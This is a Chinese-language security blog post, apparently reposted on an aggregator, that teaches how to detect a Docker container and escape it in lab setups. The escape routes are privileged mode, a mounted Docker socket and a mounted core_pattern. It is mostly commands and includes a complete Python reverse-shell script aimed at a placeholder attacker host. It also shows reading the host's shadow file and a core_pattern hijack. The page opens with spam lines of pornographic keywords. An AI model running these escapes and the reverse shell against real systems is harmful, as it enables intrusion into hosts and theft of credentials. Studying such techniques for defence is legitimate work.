国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載

這篇具有很好參考價(jià)值的文章主要介紹了云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

前言

1、Docker是干嘛的?

Docker 是一個(gè)開(kāi)放源代碼軟件,是一個(gè)開(kāi)放平臺(tái),用于開(kāi)發(fā)應(yīng)用、交付(shipping)應(yīng)用、運(yùn)行應(yīng)用。Docker允許用戶將基礎(chǔ)設(shè)施(Infrastructure)中的應(yīng)用單獨(dú)分割出來(lái),形成更小的顆粒(容器),從而提高交付軟件的速度。
Docker 容器與虛擬機(jī)類似,但二者在原理上不同,容器是將操作系統(tǒng)層虛擬化,虛擬機(jī)則是虛擬化硬件,因此容器更具有便攜性、高效地利用服務(wù)器。

2、Docker對(duì)于滲透測(cè)試影響?

3、Docker滲透測(cè)試點(diǎn)有那些?

云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全

4、前滲透-判斷在Docker中

沒(méi)有權(quán)限:端口掃描詳細(xì)信息,根據(jù)應(yīng)用對(duì)象表現(xiàn)
但是想通過(guò)端口掃描判斷對(duì)方是不是docker服務(wù)幾乎是不可能的(我沒(méi)遇到……)

拿到權(quán)限:

方式一:查詢cgroup信息

docker中:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全真實(shí)主機(jī)上:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全

方式二:檢查/.dockerenv文件

通過(guò)判斷根目錄下的 .dockerenv文件是否存在,可以簡(jiǎn)單的識(shí)別docker環(huán)境
docker中:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全真實(shí)主機(jī)上:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全
不過(guò)有一點(diǎn)需要注意的是,如果你獲取的shell權(quán)限過(guò)小的話(www-data、或是某一服務(wù)的用戶),根目錄下也是不存在.dockerenv文件的
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全

方式三:檢查mount信息

利用mount查看掛載磁盤(pán)是否存在docker相關(guān)信息。

docker中:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全真實(shí)主機(jī)上:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全

方式四:查看硬盤(pán)信息

fdisk -l 容器輸出為空,非容器有內(nèi)容輸出。

docker中:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全真實(shí)主機(jī)上:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全

方式五:查看文件系統(tǒng)以及掛載點(diǎn)

df -h 檢查文件系統(tǒng)掛載的目錄,也能夠簡(jiǎn)單判斷是否為docker環(huán)境。

df -h | egrep '(overlay|aufs)'

docker中:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全
真實(shí)主機(jī)上:
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全

參考:https://blog.csdn.net/qq_23936389/article/details/131467165

5、前滲透-鏡像中的應(yīng)用漏洞

正常web滲透測(cè)試

6、前滲透-鏡像中的默認(rèn)配置

7、后滲透-三種安全容器逃逸

-特權(quán)模式啟動(dòng)導(dǎo)致(不安全啟動(dòng) 適用于java jsp高權(quán)限無(wú)需提權(quán) 還要提權(quán)才能逃逸)
-危險(xiǎn)掛載啟動(dòng)導(dǎo)致(危險(xiǎn)啟動(dòng) 適用于java jsp高權(quán)限無(wú)需提權(quán) 還要提權(quán)才能逃逸)
-docker自身&系統(tǒng)漏洞(軟件漏洞和系統(tǒng)漏洞 都可用)
https://wiki.teamssix.com/CloudNative/
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全

容器逃逸-特權(quán)模式

啟動(dòng)靶場(chǎng):docker run --rm --privileged=true -it alpine
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全檢測(cè)環(huán)境:cat /proc/1/cgroup | grep -qi docker && echo “Is Docker” || echo “Not Docker”
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全判斷特權(quán):cat /proc/self/status | grep CapEff
如果是以特權(quán)模式啟動(dòng)的話,CapEff 對(duì)應(yīng)的掩碼值應(yīng)該為0000003fffffffff 或者是 0000001fffffffff
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全
查看目錄:fdisk -l
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全特權(quán)逃逸:mkdir /test && mount /dev/vda1 /test
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全判斷結(jié)果:嘗試訪問(wèn)宿主機(jī) shadow 文件,可以看到正常訪問(wèn)
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全

容器逃逸-危險(xiǎn)掛載

1、掛載Docker Socket逃逸

啟動(dòng)靶場(chǎng):docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
進(jìn)入環(huán)境:docker exec -it with_docker_sock /bin/bash
檢測(cè)環(huán)境:ls -lah /var/run/docker.sock
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全掛載逃逸:
apt-get update
apt-get install curl
curl -fsSL https://get.docker.com/ | sh
在容器內(nèi)部創(chuàng)建一個(gè)新的容器,并將宿主機(jī)目錄掛載到新的容器內(nèi)部
docker run -it -v /:/host ubuntu /bin/bash
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全chroot /host
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全

2、掛載宿主機(jī)procfs逃逸

啟動(dòng)環(huán)境:docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu
檢測(cè)環(huán)境:find / -name core_pattern
云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全找到當(dāng)前容器在宿主機(jī)下的絕對(duì)路徑

cat /proc/mounts | xargs -d ',' -n 1 | grep workdir

云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全這就表示當(dāng)前絕對(duì)路徑為

/var/lib/docker/overlay2/5c86feb33aba7c5fc559bee1a7b47b1f8004e1f6f20db4b97d8efbfa4cc33a19/merged

創(chuàng)建一個(gè)反彈 Shell 的 py 腳本

cat >/tmp/.x.py << EOF
#!/usr/bin/python
import os
import pty
import socket
lhost = "xx.xx.xx.xx"
lport = xxxx
def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    os.putenv("HISTFILE", '/dev/null')
    pty.spawn("/bin/bash")
    os.remove('/tmp/.x.py')
    s.close()
if __name__ == "__main__":
    main()
EOF

給 Shell 賦予執(zhí)行權(quán)限

chmod 777 .x.py

寫(xiě)入反彈 shell 到目標(biāo)的 proc 目錄下

echo -e "|/var/lib/docker/overlay2/ad9b33531057ae1736388c0198e80e49de165b12d9d16bd81fd44022cff0e72f/merged/tmp/.x.py \rcore    " >  /host/proc/sys/kernel/core_pattern

在攻擊主機(jī)上開(kāi)啟一個(gè)監(jiān)聽(tīng),然后在容器里運(yùn)行一個(gè)可以崩潰的程序

cat >/tmp/x.c << EOF
#include <stdio.h>
int main(void)
{
    int *a = NULL;
    *a = 1;
    return 0;
}
EOF
gcc x.c -o t
./t

云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全不過(guò)我這里嘗試了好幾次都沒(méi)有成功……

模擬真實(shí)場(chǎng)景:
1、高權(quán)限-Web入口到Docker逃逸(Java)

docker run --rm --privileged=true -it -p 8888:8080 vulfocus/shiro-721

云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載,Cyber-Security,云原生,docker,安全2、低權(quán)限-Web入口到Docker逃逸(PHP)

docker run --rm --privileged=true -it -p 8080:80 sagikazarmark/dvwa

java大部分都是高權(quán)限,php需提權(quán)……文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-723073.html

到了這里,關(guān)于云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測(cè)&容器逃逸&特權(quán)模式&危險(xiǎn)掛載的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問(wèn)&;容器執(zhí)行

    云上攻防-云原生篇&;Kubernetes&;K8s安全&;API&;Kubelet未授權(quán)訪問(wèn)&;容器執(zhí)行

    curl -XPOST -k “https://192.168.139.132:10250/run///” -d “cmd=id” 執(zhí)行的命令是test03容器里的命令,需要進(jìn)行容器逃逸。 1、攻擊8080端口:API Server(Master)未授權(quán)訪問(wèn) 舊版本的k8s的API Server默認(rèn)會(huì)開(kāi)啟兩個(gè)端口:8080和6443。 6443是安全端口,安全端口使用TLS加密;但是8080端口無(wú)需認(rèn)證,

    2024年04月22日
    瀏覽(71)
  • 云安全攻防(三)之 面向云原生環(huán)境的安全體系

    根據(jù)云原生環(huán)境的構(gòu)成,面向云原生環(huán)境的安全體系可包含三個(gè)層面的安全體制,它們分別是容器安全、編排系統(tǒng)安全和云原生應(yīng)用安全,下面,我們逐步來(lái)講解這三點(diǎn): 容器環(huán)境,又或者是叫容器云,其本質(zhì)是云計(jì)算的一種實(shí)現(xiàn)方式,我們可以將其稱之為PaaS或者CaaS。容器

    2024年02月15日
    瀏覽(18)
  • docker環(huán)境javacv運(yùn)行時(shí)環(huán)境檢測(cè)到致命錯(cuò)誤:SIGSEGV(0xb)

    docker環(huán)境javacv運(yùn)行時(shí)環(huán)境檢測(cè)到致命錯(cuò)誤:SIGSEGV(0xb)

    分析JVM致命錯(cuò)誤日志hs_err_pid.log 當(dāng)jvm出現(xiàn)致命錯(cuò)誤時(shí),會(huì)生成一個(gè)錯(cuò)誤文件?hs_err_pidpid.log,其中包括了導(dǎo)致jvm crash的重要信息,可以通過(guò)分析該文件定位到導(dǎo)致crash的根源,從而改善以保證系統(tǒng)穩(wěn)定。當(dāng)出現(xiàn)crash時(shí),該文件默認(rèn)會(huì)生成到工作目錄下,然而可以通過(guò)jvm參數(shù)指定

    2024年02月03日
    瀏覽(34)
  • 云原生安全:如何保護(hù)云上應(yīng)用不受攻擊

    云原生安全:如何保護(hù)云上應(yīng)用不受攻擊

    ??歡迎來(lái)到云計(jì)算技術(shù)應(yīng)用專欄~云原生安全:如何保護(hù)云上應(yīng)用不受攻擊 ☆* o(≧▽≦)o *☆嗨~我是IT·陳寒?? ?博客主頁(yè):IT·陳寒的博客 ??該系列文章專欄:云計(jì)算技術(shù)應(yīng)用 ??其他專欄:Java學(xué)習(xí)路線 Java面試技巧 Java實(shí)戰(zhàn)項(xiàng)目 AIGC人工智能 數(shù)據(jù)結(jié)構(gòu)學(xué)習(xí) 云計(jì)算技術(shù)應(yīng)用

    2024年02月04日
    瀏覽(29)
  • 更安全的驗(yàn)證碼=AIGC+集成環(huán)境信息檢測(cè)!

    黑灰產(chǎn)經(jīng)常采用批量撞庫(kù)方式登錄用戶賬號(hào),然后進(jìn)行違法違規(guī)操作。 黑灰產(chǎn)將各種方式竊取賬號(hào)密碼導(dǎo)入批量登錄軟件,登錄軟件自動(dòng)嘗試賬號(hào)登錄。郵箱服務(wù)器檢測(cè)到異常登錄請(qǐng)求,會(huì)下發(fā)驗(yàn)證碼進(jìn)行安全驗(yàn)證,但是黑灰產(chǎn)能夠自動(dòng)破解簡(jiǎn)單驗(yàn)證碼,完成撞庫(kù)登錄過(guò)程。

    2024年02月14日
    瀏覽(26)
  • 驗(yàn)證碼安全志:AIGC+集成環(huán)境信息信息檢測(cè)

    驗(yàn)證碼安全志:AIGC+集成環(huán)境信息信息檢測(cè)

    目錄 知己知彼,黑灰產(chǎn)破解驗(yàn)證碼的過(guò)程 AIGC加持,防范黑灰產(chǎn)的破解 魔高一丈,黑灰產(chǎn)+AIGC突破常規(guī)驗(yàn)證碼 雙重防護(hù),保障驗(yàn)證碼安全 黑灰產(chǎn)經(jīng)常采用批量撞庫(kù)方式登錄用戶賬號(hào),然后進(jìn)行違法違規(guī)操作。 黑灰產(chǎn)將各種方式竊取賬號(hào)密碼導(dǎo)入批量登錄軟件,登錄軟件自動(dòng)

    2024年02月14日
    瀏覽(23)
  • 目標(biāo)檢測(cè)——工業(yè)安全生產(chǎn)環(huán)境違規(guī)使用手機(jī)的識(shí)別

    目標(biāo)檢測(cè)——工業(yè)安全生產(chǎn)環(huán)境違規(guī)使用手機(jī)的識(shí)別

    一、重要性及意義 首先,工業(yè)安全生產(chǎn)環(huán)境涉及到許多復(fù)雜的工藝和設(shè)備,這些設(shè)備和工藝往往需要高精度的操作和嚴(yán)格的監(jiān)管。如果員工在生產(chǎn)過(guò)程中違規(guī)使用手機(jī),不僅可能分散其注意力,降低工作效率,更可能因操作失誤導(dǎo)致設(shè)備故障或生產(chǎn)事故,從而對(duì)員工的生命安

    2024年04月13日
    瀏覽(21)
  • 《云原生安全攻防》-- 云原生應(yīng)用風(fēng)險(xiǎn)分析

    《云原生安全攻防》-- 云原生應(yīng)用風(fēng)險(xiǎn)分析

    為了滿足每位朋友的學(xué)習(xí)需求,并且支持課程的持續(xù)更新,本系列課程提供了免費(fèi)版和付費(fèi)視頻版兩種方式來(lái)提供課程內(nèi)容。我們會(huì)持續(xù)更新課程內(nèi)容,以確保內(nèi)容的度和實(shí)用性。 在本節(jié)課程中,我們將一起探討云原生應(yīng)用在新的架構(gòu)模式下可能存在的應(yīng)用安全風(fēng)險(xiǎn)。包括以

    2024年04月08日
    瀏覽(20)
  • docker 配置 gpu版pytorch環(huán)境--部署缺陷檢測(cè)--Anomalib

    docker 配置 gpu版pytorch環(huán)境--部署缺陷檢測(cè)--Anomalib

    自行查看:三者對(duì)應(yīng)版本信息 直接在 docker.hub 中拉取 pytorch 鏡像:???????找到自己所需要的環(huán)境 pytorch鏡像 點(diǎn)擊復(fù)制 devel 版鏈接 Anomalib github 地址 我們需要docker容器中運(yùn)行Anomalib,所以需要把主機(jī)文件掛載到容器中 主機(jī)路徑: /home/dell/ljn/anomalib 沒(méi)有加這一行 --shm

    2024年02月07日
    瀏覽(23)
  • 【Docker】云原生利用Docker確保環(huán)境安全、部署的安全性、安全問(wèn)題的主要表現(xiàn)和新興技術(shù)產(chǎn)生

    【Docker】云原生利用Docker確保環(huán)境安全、部署的安全性、安全問(wèn)題的主要表現(xiàn)和新興技術(shù)產(chǎn)生

    前言 Docker 是一個(gè) 開(kāi)源的應(yīng)用容器引擎 ,讓開(kāi)發(fā)者可以打包他們的應(yīng)用以及依賴包到一個(gè)可移植的容器中,然后發(fā)布到任何流行的 Linux或Windows 操作系統(tǒng)的機(jī)器上,也可以實(shí)現(xiàn)虛擬化,容器是完全使用沙箱機(jī)制,相互之間不會(huì)有任何接口。 ??Docker十分火熱,很多人表示很少見(jiàn)如

    2024年02月11日
    瀏覽(29)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包